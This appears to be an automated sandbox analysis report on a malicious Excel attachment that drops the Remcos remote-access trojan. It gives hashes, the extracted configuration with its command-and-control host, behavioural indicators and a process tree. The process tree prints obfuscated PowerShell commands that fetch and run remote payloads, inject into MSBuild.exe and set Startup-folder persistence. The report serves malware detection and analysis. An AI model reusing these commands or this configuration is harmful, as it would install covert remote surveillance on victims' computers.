remcos | 3cd2459f1d568d4aaaf422c284892810f7cb60dc69af99adb060f84a1c94ece6

max time kernel
59s
max time network
71s
platform
windows10-1703_x64
resource
win10-20220718-es
resource tags

arch:x64arch:x86image:win10-20220718-eslocale:es-esos:windows10-1703-x64systemwindows
submitted
05-08-2022 10:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ach remit.xls
Size

32KB
MD5

d6b1e5a67d3c55b47096c958646db5b8
SHA1

29ca3e0db93d99395a893d20ab05185e105ce012
SHA256

3cd2459f1d568d4aaaf422c284892810f7cb60dc69af99adb060f84a1c94ece6
SHA512

df8de8e5124882750c712dfd1fbea94df28e467aec45ec7a67c1054828a377308b0993255687bfd7b8fb44e432d95c29b1bd1e75f5962a8595851a6a9b576b33

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

williamsmack.duckdns.org:991

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Remcos-947HIW
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4816	2460	cmd.exe	EXCEL.EXE

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

16 4452 powershell.exe
26 3364 powershell.exe
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

3364 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3364 set thread context of 5076 3364 powershell.exe MSBuild.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
16	4452	powershell.exe
26	3364	powershell.exe

pid	process
3364	powershell.exe

description	pid	process	target process
PID 3364 set thread context of 5076	3364	powershell.exe	MSBuild.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 28 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006eee23b14d26084abd5e588734d201d50000000002000000000010660000000100002000000048a2401641555538627fd8777f4c814b7fab6a1c9927c7ddf28c5035d0064a2d000000000e800000000200002000000080c6b7d8fa1a9f275e8edbb1d243e5a6f9d4e4bd2a3f1023100054af0e837bde2000000043f823c5410a4a61c05ba1ebfa520e46562c3e9bddd2be9d2834d8f82a12487340000000c14d11ae5c66c201194da96bc5a0b2ffa9b08f4bcd0201b985e65afb246cb24759a09aaf5ea98b6fb3e43aa1fe79ccd93ee902e9c8196dd09659f8819c8a8eae	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30976202"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0855f4fcaa8d801	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80ac3f50caa8d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1322293933"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30976202"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006eee23b14d26084abd5e588734d201d5000000000200000000001066000000010000200000002ff2e7daf8b8d78261e715a66a95371ef5b0e85839c6fc2aee04c875839a8783000000000e8000000002000020000000bc91efe17e9e8701922dc3fcd833436b97eea35f440a721db492251aeca03fc120000000b046ff9070ecbbf402b085aeab4e34deb41a20c1b3d5b6f6d3e6f4ebc6f20fff40000000fc359b890fb6003e6b5382990c6f2e7094d11740933cbca16dd1589ef39d048b5f41cd0c2d35b707895aa79a50db421979cdc7866445286a05470a68f48bd5bc	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7A5FE5D0-14BD-11ED-A927-FE967CFDD653} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1322293933"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000_Classes\Local Settings powershell.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2460 EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2848962218-3794400400-3934119819-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
4452	powershell.exe
4452	powershell.exe
4452	powershell.exe
3364	powershell.exe
224	powershell.exe
3364	powershell.exe
224	powershell.exe
224	powershell.exe
3364	powershell.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeIncreaseQuotaPrivilege	3364	powershell.exe
Token: SeSecurityPrivilege	3364	powershell.exe
Token: SeTakeOwnershipPrivilege	3364	powershell.exe
Token: SeLoadDriverPrivilege	3364	powershell.exe
Token: SeSystemProfilePrivilege	3364	powershell.exe
Token: SeSystemtimePrivilege	3364	powershell.exe
Token: SeProfSingleProcessPrivilege	3364	powershell.exe
Token: SeIncBasePriorityPrivilege	3364	powershell.exe
Token: SeCreatePagefilePrivilege	3364	powershell.exe
Token: SeBackupPrivilege	3364	powershell.exe
Token: SeRestorePrivilege	3364	powershell.exe
Token: SeShutdownPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeSystemEnvironmentPrivilege	3364	powershell.exe
Token: SeRemoteShutdownPrivilege	3364	powershell.exe
Token: SeUndockPrivilege	3364	powershell.exe
Token: SeManageVolumePrivilege	3364	powershell.exe
Token: 33	3364	powershell.exe
Token: 34	3364	powershell.exe
Token: 35	3364	powershell.exe
Token: 36	3364	powershell.exe
Token: SeIncreaseQuotaPrivilege	3364	powershell.exe
Token: SeSecurityPrivilege	3364	powershell.exe
Token: SeTakeOwnershipPrivilege	3364	powershell.exe
Token: SeLoadDriverPrivilege	3364	powershell.exe
Token: SeSystemProfilePrivilege	3364	powershell.exe
Token: SeSystemtimePrivilege	3364	powershell.exe
Token: SeProfSingleProcessPrivilege	3364	powershell.exe
Token: SeIncBasePriorityPrivilege	3364	powershell.exe
Token: SeCreatePagefilePrivilege	3364	powershell.exe
Token: SeBackupPrivilege	3364	powershell.exe
Token: SeRestorePrivilege	3364	powershell.exe
Token: SeShutdownPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeSystemEnvironmentPrivilege	3364	powershell.exe
Token: SeRemoteShutdownPrivilege	3364	powershell.exe
Token: SeUndockPrivilege	3364	powershell.exe
Token: SeManageVolumePrivilege	3364	powershell.exe
Token: 33	3364	powershell.exe
Token: 34	3364	powershell.exe
Token: 35	3364	powershell.exe
Token: 36	3364	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

988 iexplore.exe

pid	process
988	iexplore.exe

Suspicious use of SetWindowsHookEx 19 IoCs

Processes:

EXCEL.EXEiexplore.exeIEXPLORE.EXEMSBuild.exe

pid	process
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
988	iexplore.exe
988	iexplore.exe
1080	IEXPLORE.EXE
1080	IEXPLORE.EXE
5076	MSBuild.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeiexplore.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2460 wrote to memory of 4816	2460	EXCEL.EXE	cmd.exe
PID 2460 wrote to memory of 4816	2460	EXCEL.EXE	cmd.exe
PID 4816 wrote to memory of 4452	4816	cmd.exe	powershell.exe
PID 4816 wrote to memory of 4452	4816	cmd.exe	powershell.exe
PID 4452 wrote to memory of 660	4452	powershell.exe	WScript.exe
PID 4452 wrote to memory of 660	4452	powershell.exe	WScript.exe
PID 988 wrote to memory of 1080	988	iexplore.exe	IEXPLORE.EXE
PID 988 wrote to memory of 1080	988	iexplore.exe	IEXPLORE.EXE
PID 988 wrote to memory of 1080	988	iexplore.exe	IEXPLORE.EXE
PID 660 wrote to memory of 3364	660	WScript.exe	powershell.exe
PID 660 wrote to memory of 3364	660	WScript.exe	powershell.exe
PID 660 wrote to memory of 224	660	WScript.exe	powershell.exe
PID 660 wrote to memory of 224	660	WScript.exe	powershell.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe
PID 3364 wrote to memory of 5076	3364	powershell.exe	MSBuild.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ach remit.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\fOMzZ.bat" "
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -WindowStyle hidden IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICdTaWxlbnRseUNvbnRpbnVlJzskdTBoajQ0dHQgPSAnW0VudW1dOjpUb09iamVjdChbU3lzdGVtLk4nICsnZXQuU2VjdXJpJyArJ3R5UHJvdG8nICsnY29sVHlwZV0sIDMwNzIpJ3xJRVg7W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgPSAkdTBoajQ0dDskd2UyMj0nZVcudGVOIHRjJyArICdlamJPLXdlTignOyAkYjRkZj0nb2xud29ELil0bmVpJyArICdsQ2InOyAkYzM9JyknJ3Nidi5kbGl1QlNNXCcnK3BtZXQ6dm5lJCwnJ3Nidi50bmVpbEMgZGV0Y2V0b3JQL2V0b24vYWcudG5lbXRzbmkvLzpwdHRoJycoZWxpRmRhJzskVEM9JGMzLCRiNGRmLCR3ZTIyIC1Kb2luICcnO0lFWCgoW3JlZ2V4XTo6TWF0Y2hlcygkVEMsJy4nLCdSaWdodFRvTGVmdCcpIHwgRm9yRWFjaCB7JF8udmFsdWV9KSAtam9pbiAnJyk7c3RhcnQtcHJvY2VzcygkZW52OnRlbXArICdcTVNCdWlsZC52YnMnKTtyZW1vdmUtaXRlbSAoJGVudjpVU0VSUFJPRklMRSArICdcZk9NelouYmF0Jyk=')))
3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4452

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MSBuild.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01101001,01101110,01110011,01110100,01101101,01100101,01101110,01110100,00101110,01100111,01100001,00101111,01101110,01101111,01110100,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3364

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:5076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\MSBuild.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.vbs'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:224

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:988

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:988 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1080

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
4180fc1109043ba70ff0e5ff26a9e1f8

SHA1
799702b71147d7a5e8f1b71714a2b859909767d2

SHA256
e1e2f4279d95c9f895c364e055769f17a9aefbb12e34cdebbefb9d345adc4836

SHA512
fb74451d2dc999cf2db3e458ba98c272125a086c3b9561400a182221d1678485f4a8a41521ccf954706772c6f68fcbf41774aa446ff66044da42477bfc284364

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
cc2dcbdeac75a756041476ba44e64804

SHA1
806536bc8869694b7b94b5178bf72d3b48a9b960

SHA256
4e9041afb782bd25d72de6f0f22290c58b5ba6f37024949050f7f0aabbdef988

SHA512
b2ffb39aab8ad050aa7ddc1c026eafb76e3bbfd3a5ce62db64db0e4132aa5d757dae600b3e99546fa9761a8cc4f9745ff315f933823c5ebc58d8d5c2b61a294e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1dbc777f4ea71192f17f71703be5478e

SHA1
1b00c0510936be4eb65e783f4d77f60948a4ca7a

SHA256
26eca44c10ce8c77f9dcff0043d705a1f8e234e9b9ed6f4715c31ea1e0c992c8

SHA512
233c0570092441bbf10c28dc3a8750759994621ee2f24720d9c9e22c386052499794182e7e0086cfd8b31e529e31b7e57efad3827ff92219187798cfd711da50

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSBuild.vbs
Filesize
2KB

MD5
72fc1ac661bc37bb1490dac2c0c5ca9b

SHA1
f315cd14c12f8024ef17a21594aea6c06432dcfb

SHA256
31ee16ff5b988670caab281265a8e02f4ff168f5ee7fef232c4625ebbe693c15

SHA512
37e6befb5e37773fc3d8726af53a9cae36031a81f348d834b0a47358d3c96cb91768a6ea62ac9586adeb1a2a073a838053eb775da429e99228ddda518fe40684

Download Submit
C:\Users\Admin\fOMzZ.bat
Filesize
847B

MD5
0d3332dab10cfa756bb2e3782126575c

SHA1
5f4b87871f5f77effc37d17ec240f2e34cdadb4c

SHA256
d2f8f2e00fa3d58ed14f5431c7806a00f670db06eeb7fe77ece96c0a7ae3de53

SHA512
b7e050c8a7015e8085595f53e97757de3a6def168ae74fcc180be24dd711beeef0d048525ee5758b220d9b9ae76c0b6d9e178f6fc7848580348f8e64226598fa

Download Submit
\Users\Admin\AppData\Local\Temp\00f4c54f-fbb7-4a6e-83b1-3711c40641b3\AgileDotNetRT64.dll
Filesize
75KB

MD5
42b2c266e49a3acd346b91e3b0e638c0

SHA1
2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

SHA256
adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

SHA512
770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Download Submit
memory/224-316-0x0000000000000000-mapping.dmp

Download
memory/660-310-0x0000000000000000-mapping.dmp

Download
memory/2460-117-0x00007FFAE9360000-0x00007FFAE9370000-memory.dmp

Filesize
64KB

Download
memory/2460-275-0x0000015B9D988000-0x0000015B9D98A000-memory.dmp

Filesize
8KB

Download
memory/2460-130-0x00007FFAE6060000-0x00007FFAE6070000-memory.dmp

Filesize
64KB

Download
memory/2460-129-0x00007FFAE6060000-0x00007FFAE6070000-memory.dmp

Filesize
64KB

Download
memory/2460-120-0x00007FFAE9360000-0x00007FFAE9370000-memory.dmp

Filesize
64KB

Download
memory/2460-119-0x00007FFAE9360000-0x00007FFAE9370000-memory.dmp

Filesize
64KB

Download
memory/2460-118-0x00007FFAE9360000-0x00007FFAE9370000-memory.dmp

Filesize
64KB

Download
memory/3364-349-0x0000022BC8780000-0x0000022BC8794000-memory.dmp

Filesize
80KB

Download
memory/3364-315-0x0000000000000000-mapping.dmp

Download
memory/3364-369-0x0000022BC87A0000-0x0000022BC87C8000-memory.dmp

Filesize
160KB

Download
memory/3364-370-0x0000022BC87D0000-0x0000022BC87E8000-memory.dmp

Filesize
96KB

Download
memory/3364-383-0x0000022BC8C50000-0x0000022BC8C6E000-memory.dmp

Filesize
120KB

Download
memory/3364-385-0x00007FFB05220000-0x00007FFB0534C000-memory.dmp

Filesize
1.2MB

Download
memory/4452-289-0x000001C5FDA30000-0x000001C5FDAA6000-memory.dmp

Filesize
472KB

Download
memory/4452-284-0x000001C5FD5F0000-0x000001C5FD6F2000-memory.dmp

Filesize
1.0MB

Download
memory/4452-282-0x000001C5E5120000-0x000001C5E5142000-memory.dmp

Filesize
136KB

Download
memory/4452-281-0x000001C5E4BE0000-0x000001C5E4BF0000-memory.dmp

Filesize
64KB

Download
memory/4452-280-0x000001C5FD320000-0x000001C5FD3A2000-memory.dmp

Filesize
520KB

Download
memory/4452-274-0x0000000000000000-mapping.dmp

Download
memory/4816-272-0x0000000000000000-mapping.dmp

Download
memory/5076-397-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-418-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-389-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-390-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-391-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-392-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-393-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
